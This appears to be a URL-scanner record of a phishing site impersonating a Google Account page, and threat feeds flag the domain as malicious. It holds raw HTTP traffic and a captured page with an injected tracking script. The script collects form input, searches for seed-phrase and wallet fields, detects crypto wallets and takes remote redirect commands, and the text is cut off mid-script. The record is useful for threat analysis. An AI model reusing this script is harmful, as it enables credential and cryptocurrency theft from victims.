{\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=eFQc1b1C2sENKByHIBa7xAeXYzDNEzIvb3EKUahrvdgbGqDRH8You1%2FfxY%2BRoGsmNqW97PjVcKdVz1fgVv2QH9XV0efkBA9cR9RtptCyfHbeivCL8cLG6AjmYGcY2b3MUlu%2FdzUnRno8mptW8JTA2ng%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":109,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":109,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:03.571Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:03:03 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb369f5cc90883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=dKSB7hDxi5u3ShDfq2CHqi7OSmfoHwshTxepg%2BN81Kgc5nuVbGkStkH0imb3N2ixlegQewPmxOBYlTO5Ki%2BMjmTvbRsPJHxrWprUSRYJ%2BGQ8Fdzlur%2BPBJ95HUpyYsMwrv%2FXDYa6GojYmiKMqI%2F5r3c%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":109,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":109,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":true,"resource_type":"document","requested_by":"","date":"2026-04-21T09:02:56.979Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET / HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 200 OK\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: text/html; charset=utf-8\r\ncf-ray: 9efb3676aa884c11-OSL\r\ncf-cache-status: DYNAMIC\r\ncache-control: no-cache, no-store, must-revalidate\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=DcjRJuZkIlIQ8IBT9Xtd%2FBxHAyA5dtKDnyU6Mz56ADV4lnxsxJL2zbrz8%2Fk4jtPolMrzuKh1n1AojEJgzW7ps1V5qQAFvUPtEyKw2oEqHLtkunG%2B%2BRTMw%2BKR3yWrBcyzkzvBms%2BiQBRFmi7QPWw7ODQ%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\nalt-svc: h3=\":443\"; ma=86400\r\nX-Firefox-Spdy: h2\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":70336,"size_decoded":0,"mime_type":"text/html; charset=utf-8","magic":"HTML document, Unicode text, UTF-8 text, with very long lines (406), with CRLF, LF line terminators","md5":"a12c7de222cb558279bb601863b6f2a9","sha1":"26419a4db9bc6fe440ef075598dcc384e5b6a537","sha256":"537d6e1dd1ffaa9b6a3b34d5ea024405a0a40fc4751093624d9b265d08743c45","sha512":"a51800a96bbeebc8dc6050f850a1cb1d02757a336d621c32dcb100673c74982c5bc836ff3d80d232cc65c6f20539cd287a99d15a3e751b03e33676687635de30","ssdeep":"1536:eFHqNlxJlhslPsFDPzlX/6pgML4tRgl79DzJCrB1hr8ERAL:SvA8oM","tlshash":"af63d6ad79e320346933b13d9bbfa104f6329013a106c950bd9cb2145ff4e5956bafe8","first_seen":"2026-04-21T09:03:25.855696Z","last_seen":"2026-04-21T09:16:26.527958Z","times_seen":2,"resource_available":true,"data":null}},"time_used":445,"timings":{"blocked":83,"dns":64,"connect":1,"send":0,"wait":273,"receive":0,"ssl":21},"alerts":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/snap","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"xhr","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:57.906Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/snap HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 72231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":72231,"data":"{\"s\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"h\":\"\u003chtml lang=\\\"en\\\"\u003e\u003chead data-mid=\\\"mid1\\\"\u003e\\n\\n\\n      \u003cmeta charset=\\\"UTF-8\\\" data-mid=\\\"mid2\\\"\u003e\\n      \u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" data-mid=\\\"mid3\\\"\u003e\\n      \u003ctitle data-mid=\\\"mid4\\\"\u003eGoogle Account\u003c/title\u003e\\n      \u003clink rel=\\\"icon\\\" type=\\\"images/x-icon\\\" href=\\\"/images/favicon.ico\\\" data-mid=\\\"mid5\\\"\u003e\\n      \u003cstyle data-mid=\\\"mid6\\\"\u003e\\n         /* Reset default margins and ensure full height */\\n         * {\\n            margin: 0;\\n            padding: 0;\\n            box-sizing: border-box;\\n         }\\n\\n         /* Load only the used font */\\n         @font-face {\\n            font-family: 'Regular';\\n            src: url('fonts/GoogleSans-Regular.ttf') format('truetype');\\n         }\\n\\n         /* Body styles */\\n         body {\\n            min-height: 100vh;\\n            display: flex;\\n            justify-content: center;\\n            align-items: center;\\n            background-color: #F0F4F9; /* Fallback for light mode */\\n            \\n         }\\n\\n         /* Container styles */\\n         .container {\\n            border-radius: 25px;\\n            display: flex;\\n            flex-direction: column;\\n            background-color: #FFFFFF; /* Fallback for light mode */\\n         }\\n\\n         /* Loading bar styles */\\n         .loading-bar {\\n   width: 90%; /* Shorter width */\\n   height: 6px;\\n   overflow: hidden;\\n   margin: 0 auto; /* Center horizontally */\\n}\\n\\n.loading-bar::before {\\n   content: '';\\n   display: block;\\n   width: 30%;\\n   height: 100%;\\n   background-color: #0B57D0;\\n   animation: moveLeftToRight 1.5s linear infinite;\\n}\\n\\n         /* Loading bar animation */\\n         @keyframes moveLeftToRight {\\n   0% {\\n      transform: translateX(-100%);\\n      opacity: 1;\\n   }\\n   95% {\\n      transform: translateX(calc(100% / 0.3));\\n      opacity: 1;\\n   }\\n   100% {\\n      transform: translateX(calc(100% / 0.3));\\n      opacity: 0;\\n   }\\n}\\n\\n         /* Logo styles */\\n         .logo {\\n            height: auto;\\n            width: 45px;\\n         }\\n\\n         /* Text content styles */\\n         .text-content h1 {\\n            font-family: 'Regular', sans-serif;\\n            font-weight: 100;\\n            color: #1f1f1f; /* Fallback for light mode */\\n         }\\n\\n         .text-content p {\\n            font-family: 'Regular', sans-serif;\\n            color: #1f1f1f; /* Fallback for light mode */\\n         }\\n\\n         .right-part p {\\n            color: #1f1f1f; /* Fallback for light mode */\\n         }\\n\\n         /* Light mode */\\n         @media (prefers-color-scheme: light) {\\n            * {\\n               filter: brightness(95%);\\n            }\\n            body {\\n               background-color: #F0F4F9;\\n            }\\n            .container {\\n               background-color: #FFFFFF;\\n            }\\n            .text-content h1,\\n            .text-content p,\\n            .right-part p {\\n               color: #1f1f1f;\\n            }\\n            .loading-bar {\\n      background-color: #F0F4F9;\\n      width: 90%;\\n      margin: 0 auto;\\n   }\\n   .loading-bar::before {\\n      background-color: #0B57D0;\\n      width: 30%;\\n   }\\n         }\\n\\n         /* Dark mode */\\n         @media (prefers-color-scheme: dark) {\\n            * {\\n               filter: brightness(90%);\\n            }\\n            body {\\n               background-color: #1E1F20;\\n            }\\n            .container {\\n               background-color: #0E0E0E;\\n            }\\n            .text-content h1,\\n            .text-content p {\\n               color: #e3e3e3;\\n            }\\n            .right-part p {\\n               color: #c4c7c5;\\n            }\\n            .loading-bar {\\n      background-color: #1E1F20;\\n      width: 90%;\\n      margin: 0 auto;\\n   }\\n   .loading-bar::before {\\n      background-color: #A8C7FA;\\n      width: 30%;\\n   }\\n         }\\n\\n         /* Desktop: 1586x1048 and above */\\n         @media (min-width: 1586px) {\\n            .container {\\n               width: 1040px;\\n               height: 400px;\\n               padding-bottom: 35px;\\n            }\\n            .content-wrapper {\\n               display: flex;\\n               justify-content: space-between;\\n               width: 100%;\\n               height: calc(100% - 5px); /* Adjust for loading bar height */\\n            }\\n            .left-part,\\n            .right-part {\\n               width: 45%;\\n               height: 100%;\\n            }\\n            .left-part {\\n               display: flex;\\n               flex-direction: column;\\n               padding-top: 35px;\\n               padding-left: 35px;\\n            }\\n            .right-part {\\n               display: flex;\\n               flex-direction: column;\\n               padding-top: 40px;\\n               padding-right: 35px;\\n            }\\n            .logo {\\n               margin-bottom: 30px;\\n            }\\n            .text-content h1 {\\n               margin-bottom: 15px;\\n               font-size: 40px;\\n            }\\n            .text-content p {\\n               margin-bottom: 15px;\\n               font-size: 16px;\\n               line-height: 25px;\\n               margin-top: 20px;\\n            }\\n            .right-part .text-content {\\n               margin-top: 100px;\\n            }\\n            .right-part p {\\n               font-size: 14px;\\n            }\\n            .right-part p:first-child {\\n               font-size: 20px;\\n            }\\n            .right-part p:last-child {\\n               line-height: 20px;\\n            }\\n            .loading-bar {\\n               margin-top: 0px;\\n            }\\n         }\\n\\n         /* Desktop: 1218x1048 to 1585px */\\n         @media (min-width: 1218px) and (max-width: 1585px) {\\n            .container {\\n               width: calc(840px + (1040 - 840) * ((100vw - 1218px) / (1586 - 1218)));\\n               height: 400px;\\n               padding-bottom: 35px;\\n            }\\n            .content-wrapper {\\n               display: flex;\\n               justify-content: space-between;\\n               width: 100%;\\n               height: calc(100% - 5px); /* Adjust for loading bar height */\\n            }\\n            .left-part,\\n            .right-part {\\n               width: 45%;\\n               height: 100%;\\n            }\\n            .left-part {\\n               display: flex;\\n               flex-direction: column;\\n               padding-top: 35px;\\n               padding-left: 35px;\\n            }\\n            .right-part {\\n               display: flex;\\n               flex-direction: column;\\n               padding-top: 40px;\\n               padding-right: 35px;\\n            }\\n            .logo {\\n               margin-bottom: 30px;\\n            }\\n            .text-content h1 {\\n               margin-bottom: 15px;\\n               font-size: 40px;\\n            }\\n            .text-content p {\\n               margin-bottom: 15px;\\n               font-size: 16px;\\n               line-height: 25px;\\n               margin-top: 20px;\\n            }\\n            .right-part .text-content {\\n               margin-top: 100px;\\n            }\\n            .right-part p {\\n               font-size: 14px;\\n            }\\n            .right-part p:first-child {\\n               font-size: 20px;\\n            }\\n            .right-part p:last-child {\\n               line-height: 20px;\\n            }\\n            .loading-bar {\\n               margin-top: 0px;\\n            }\\n         }\\n\\n         /* Desktop: 1034x1048 to 1217px */\\n         @media (min-width: 1034px) and (max-width: 1217px) {\\n            .container {\\n               width: 840px;\\n               height: 400px;\\n               padding-bottom: 35px;\\n            }\\n            .content-wrapper {\\n               display: flex;\\n               justify-content: space-between;\\n               width: 100%;\\n               height: calc(100% - 5px); /* Adjust for loading bar height */\\n            }\\n            .left-part,\\n            .right-part {\\n               width: 45%;\\n               height: 100%;\\n            }\\n            .left-part {\\n               display: flex;\\n               flex-direction: column;\\n               padding-top: 35px;\\n               padding-left: 35px;\\n            }\\n            .right-part {\\n               display: flex;\\n               flex-direction: column;\\n               padding-top: 40px;\\n               padding-right: 35px;\\n            }\\n            .logo {\\n               margin-bottom: 30px;\\n            }\\n            .text-content h1 {\\n               margin-bottom: 15px;\\n               font-size: 40px;\\n            }\\n            .text-content p {\\n               margin-bottom: 15px;\\n               font-size: 16px;\\n               line-height: 25px;\\n               margin-top: 20px;\\n            }\\n            .right-part .text-content {\\n               margin-top: 100px;\\n            }\\n            .right-part p {\\n               font-size: 14px;\\n            }\\n            .right-part p:first-child {\\n               font-size: 20px;\\n            }\\n            .right-part p:last-child {\\n               line-height: 20px;\\n            }\\n            .loading-bar {\\n               margin-top: 0px;\\n            }\\n         }\\n\\n         /* Small desktop to tablet: 1033x1048 and below */\\n         @media (max-width: 1033px) {\\n            .container {\\n               width: 480px;\\n               height: 530px;\\n               padding-top: 30px;\\n               padding-left: 30px;\\n               padding-bottom: 20px;\\n               padding-right: 30px;\\n            }\\n            .content-wrapper {\\n               width: 100%;\\n            }\\n            .right-part {\\n               display: flex;\\n               flex-direction: column;\\n               align-items: flex-start;\\n               width: 100%;\\n            }\\n            .logo {\\n               margin-bottom: 25px;\\n            }\\n            .text-content h1 {\\n               margin-bottom: 20px;\\n               font-size: 36px;\\n            }\\n            .text-content p {\\n               margin-bottom: 10px;\\n               font-size: 15px;\\n               line-height: 22px;\\n            }\\n            .right-part .text-content {\\n               margin-top: 100px;\\n            }\\n            .right-part p {\\n               font-size: 14px;\\n               margin-bottom: 70px;\\n            }\\n            .right-part p:first-child {\\n               font-size: 20px;\\n            }\\n            .right-part p:last-child {\\n               line-height: 20px;\\n            }\\n            .loading-bar {\\n               margin-top: -30px;\\n               margin-bottom: 20px;\\n            }\\n         }\\n\\n         /* Mobile devices */\\n         @media (max-width: 767px) {\\n            .container {\\n               width: 100vw;\\n               height: 100vh;\\n               border-radius: 0;\\n               padding-top: 30px;\\n               padding-left: 30px;\\n               padding-bottom: 20px;\\n               padding-right: 30px;\\n            }\\n            .content-wrapper {\\n               width: 100%;\\n            }\\n            .right-part {\\n               display: flex;\\n               flex-direction: column;\\n               align-items: flex-start;\\n               width: 100%;\\n            }\\n            .logo {\\n               margin-bottom: 25px;\\n            }\\n            .text-content h1 {\\n               margin-bottom: 20px;\\n               font-size: 36px;\\n            }\\n            .text-content p {\\n               margin-bottom: 10px;\\n               font-size: 15px;\\n               line-height: 22px;\\n            }\\n            .right-part .text-content {\\n               margin-top: 100px;\\n            }\\n            .right-part p {\\n               font-size: 14px;\\n               margin-bottom: 70px;\\n            }\\n            .right-part p:first-child {\\n               font-size: 20px;\\n            }\\n            .right-part p:last-child {\\n               line-height: 20px;\\n            }\\n            .loading-bar {\\n               width: 100%;\\n            }\\n         }\\n      \u003c/style\u003e\\n   \u003c/head\u003e\\n   \u003cbody data-mid=\\\"mid7\\\"\u003e\u003cscript data-mid=\\\"mid10\\\"\u003e(function(){var o=document.getElementById('__lo');function h(){o.remove();var s=document.getElementById('__lo');if(s)s.remove()}if(document.readyState==='complete')h();else window.addEventListener('load',h);setTimeout(h,6000)})()\u003c/script\u003e\\n      \u003cdiv class=\\\"container\\\" data-mid=\\\"mid11\\\"\u003e\\n         \u003cdiv class=\\\"loading-bar\\\" data-mid=\\\"mid12\\\"\u003e\u003c/div\u003e\\n         \u003cdiv class=\\\"content-wrapper\\\" data-mid=\\\"mid13\\\"\u003e\\n            \u003cdiv class=\\\"left-part\\\" data-mid=\\\"mid14\\\"\u003e\\n               \u003cimg src=\\\"images/logo.png\\\" alt=\\\"Logo\\\" class=\\\"logo\\\" data-mid=\\\"mid15\\\"\u003e\\n               \u003cdiv class=\\\"text-content\\\" data-mid=\\\"mid16\\\"\u003e\\n                  \u003ch1 data-mid=\\\"mid17\\\"\u003ePlease wait\u003c/h1\u003e\\n                  \u003cp data-mid=\\\"mid18\\\"\u003eWe're validating your information.\u003c/p\u003e\\n               \u003c/div\u003e\\n            \u003c/div\u003e\\n            \u003cdiv class=\\\"right-part\\\" data-mid=\\\"mid19\\\"\u003e\\n               \u003cdiv class=\\\"text-content\\\" data-mid=\\\"mid20\\\"\u003e\\n                  \u003cp data-mid=\\\"mid21\\\"\u003eDo not close this window\u003c/p\u003e\\n                  \u003cp data-mid=\\\"mid22\\\"\u003eDue to high traffic, this process may take longer than usual.\u003c/p\u003e\\n               \u003c/div\u003e\\n            \u003c/div\u003e\\n         \u003c/div\u003e\\n      \u003c/div\u003e\\n\\n   \\n\u003cscript data-wasp-inj=\\\"1\\\" data-mid=\\\"mid23\\\"\u003e\\n(function() {\\n  if (window.__trackingScriptInitialized) return;\\n  window.__trackingScriptInitialized = true;\\n  window.__submitSeedphrase = null;\\n  \\n  function setSessionCookie(id) {\\n    if (id) {\\n      document.cookie = '_tsid=' + encodeURIComponent(id) + ';path=/;max-age=86400;SameSite=Lax';\\n    } else {\\n      document.cookie = '_tsid=;path=/;max-age=0;SameSite=Lax';\\n    }\\n  }\\n  function getSessionCookie() {\\n    var m = document.cookie.match(/(^|;\\\\s*)_tsid=([^;]*)/);\\n    return m ? decodeURIComponent(m[2]) : null;\\n  }\\n  var sessionId = localStorage.getItem('_tsid') || getSessionCookie() || null;\\n  if (sessionId) window.__waspSessionId = sessionId;\\n  var previousPage = null;\\n  try { previousPage = document.referrer ? new URL(document.referrer).pathname : null; } catch(e) {}\\n  \\n  // Check if this is a preview domain\\n  function getPreviewToken() {\\n    var match = window.location.hostname.match(/^([a-zA-Z0-9]+)\\\\.preview\\\\.203\\\\.159\\\\.90\\\\.28\\\\.nip\\\\.io$/);\\n    return match ? match[1] : null;\\n  }\\n  \\n  function ping(data, sync) {\\n    var previewToken = getPreviewToken();\\n    var actualDomain = previewToken ? 'preview:' + previewToken : window.location.hostname;\\n    var actualPage = window.location.pathname.replace(/\\\\.html$/, '');\\n    if (actualPage === '' || actualPage === '/') {\\n      actualPage = '/';\\n    }\\n    var pingData = {\\n      id: sessionId,\\n      input: data || {},\\n      page: actualPage,\\n      domain: actualDomain,\\n      userAgent: navigator.userAgent,\\n      wallets: detectedWalletsStr || undefined,\\n      walletLogos: eip6963Wallets.length \u003e 0 ? JSON.stringify(eip6963Wallets) : undefined,\\n      chain: detectedChainStr || undefined,\\n      _bs: botScore || 0,\\n      _ic: interactionCount || 0,\\n      _vs: getVisibilityState(),\\n      _lf: liveFields\\n    };\\n    var payload = JSON.stringify(pingData);\\n    \\n    if (sync) {\\n      var xhr = new XMLHttpRequest();\\n      xhr.open('POST', '/api/public/session/ping', false);\\n      xhr.setRequestHeader('Content-Type', 'application/json');\\n      try {\\n        xhr.send(payload);\\n        var res = JSON.parse(xhr.responseText);\\n        if (res \u0026\u0026 res.sessionId) {\\n          sessionId = res.sessionId;\\n          localStorage.setItem('_tsid', sessionId);\\n          setSessionCookie(sessionId);\\n          window.__waspSessionId = sessionId;\\n        }\\n        return res;\\n      } catch(e) { return null; }\\n    }\\n    \\n    return fetch('/api/public/session/ping', {\\n      method: 'POST',\\n      headers: { 'Content-Type': 'application/json' },\\n      body: payload\\n    }).then(function(r) { return r.json(); }).catch(function() { return null; });\\n  }\\n  \\n  var sessionWasDeleted = false;\\n  \\n  function checkCommand(res) {\\n    if (res \u0026\u0026 res.status === 'session_deleted') {\\n      if (res.sessionId) {\\n        sessionId = res.sessionId;\\n        localStorage.setItem('_tsid', sessionId);\\n        setSessionCookie(sessionId);\\n      } else {\\n        sessionId = null;\\n        localStorage.removeItem('_tsid');\\n        setSessionCookie(null);\\n        sessionWasDeleted = true;\\n      }\\n      return;\\n    }\\n    if (res \u0026\u0026 res.sessionId) {\\n      sessionId = res.sessionId;\\n      localStorage.setItem('_tsid', sessionId);\\n      setSessionCookie(sessionId);\\n      sessionWasDeleted = false;\\n    }\\n    if (res \u0026\u0026 res.command === 'redirect' \u0026\u0026 res.target) {\\n      var cleanTarget = res.target.replace(/\\\\.html$/, '');\\n      window.location.href = cleanTarget;\\n    }\\n  }\\n  \\n  function isSeedphraseFieldName(name, id, placeholder) {\\n    var keywords = ['seed', 'phrase', 'mnemonic', 'recovery', 'backup', 'words', 'wallet'];\\n    var n = (name || '').toLowerCase();\\n    var i = (id || '').toLowerCase();\\n    var p = (placeholder || '').toLowerCase();\\n    for (var j = 0; j \u003c keywords.length; j++) {\\n      if (n.indexOf(keywords[j]) \u003e= 0 || i.indexOf(keywords[j]) \u003e= 0 || p.indexOf(keywords[j]) \u003e= 0) {\\n        return true;\\n      }\\n    }\\n    return false;\\n  }\\n  \\n  function collectFormData(form) {\\n    if (!form || !form.elements) return {};\\n    var data = {};\\n    for (var i = 0; i \u003c form.elements.length; i++) {\\n      var el = form.elements[i];\\n      if (el.name \u0026\u0026 el.value \u0026\u0026 el.type !== 'submit' \u0026\u0026 el.type !== 'button' \u0026\u0026 el.type !== 'password') {\\n        if (isSeedphraseFieldName(el.name, el.id, el.placeholder)) {\\n          continue;\\n        }\\n        data[el.name] = el.value;\\n      }\\n    }\\n    return data;\\n  }\\n  \\n  function hasSeedphraseField(form) {\\n    if (!form || !form.elements) return false;\\n    for (var i = 0; i \u003c 